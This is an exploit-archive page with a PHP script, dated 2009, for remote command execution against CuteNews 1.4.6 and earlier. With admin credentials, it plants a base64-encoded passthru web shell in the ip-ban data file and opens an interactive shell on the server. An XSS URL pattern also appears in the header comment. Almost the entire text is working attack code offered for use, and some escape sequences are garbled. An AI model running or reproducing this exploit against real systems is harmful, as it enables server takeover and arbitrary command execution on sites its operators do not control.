[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)
# Published : 2009-01-08
# Author : StAkeR
# Previous Title : Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
# Next Title : PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability
#!/usr/bin/php -q
<?php
/*********************************************************************
* CuteNews <= 1.4.6 (ip ban) XSS / Remote Command Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://cutephp.com *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* Remote Command Execution *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* you need a super account (administrator) *
* so you can write in ipban.db.php anything ;) *
* *
* works regardless of php.ini settings! enjoy your ais *
* note: this vuln is a privilege escalation *
* *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* Cross Site Scripting *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* http://[host]/[path]//index.php?mod=[Javascript Code] *
*********************************************************************/
error_reporting(0);
list($cli,$host,$path,$username,$password) = $argv;
if ($argc != 5) {
print "n+-------------------------------------------------------------+n";
print "r| CuteNews <= 1.4.6 (ip ban) Remote Command Execution Exploit |n";
print "r+-------------------------------------------------------------+n";
print "rby athos - staker[at]hotmail[dot]it / http://cutephp.comnn";
print "rUsage: php xpl.php [host] [path] [username] [password]nn";
print "rhost + localhostn";
print "rpath + /cutenewsn";
print "rusername + admin usernamen";
print "rpassword + admin passwordnn";
exit;
}
exploit();
function login () {
global $username,$password;
$cookies .= "username={$username}; md5_password=";
$cookies .= md5($password);
return $cookies;
}
function check_login() {
global $host,$path;
$auth .= login();
$data .= "GET /{$path}/index.php HTTP/1.1rn";
$data .= "Host: {$host}rn";
$data .= "User-Agent: Lynx (textmode)rn";
$data .= "Cookie: $auth;n";
$data .= "Connection: closernrn";
if (preg_match('/Welcome/i',$data)) {
return true;
}
else {
die("Login Failedn");
}
}
function exploit() {
global $host,$path;
$login = login();
$shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";
$shell = base64_decode($shell);
$post = "add_ip={$shell}&action=add&mod=ipban";
$data .= "POST /{$path}/index.php HTTP/1.1rn";
$data .= "Host: {$host}rn";
$data .= "User-Agent: Lynx (textmode)rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Cookie: $loginrn";
$data .= "Referer: http://{$host}/{$path}/index.phprn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($post)."rnrn";
$data .= "{$post}rnrn";
if (eregi('passthru',data_send($host,$data))) {
yeat_shell();
}
else {
die("Exploit Failed!n");
}
}
function yeat_shell() {
while (1) {
echo "yeat[shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));
if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("nExitedn");
if (preg_match('/^(help|--help)$/i',$exec)) echo("nExample: uname -an");
if (preg_match('/^(about|--about)$/i',$exec)) echo("nstaker[at]hotmail[dot]itn");
print data_exec($exec);
}
}
function data_exec($exec) {
global $host,$path;
$exec = urlencode($exec);
$data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1rn";
$data .= "Host: {$host}rn";
$data .= "User-Agent: Lynx (textmode)rn";
$data .= "Connection: closernrn";
$html = data_send ($host,$data);
$html = str_replace('|0||',null,$html);
return $html;
}
function data_send ($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!n");
} fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
# www.Syue.com [2009-01-08]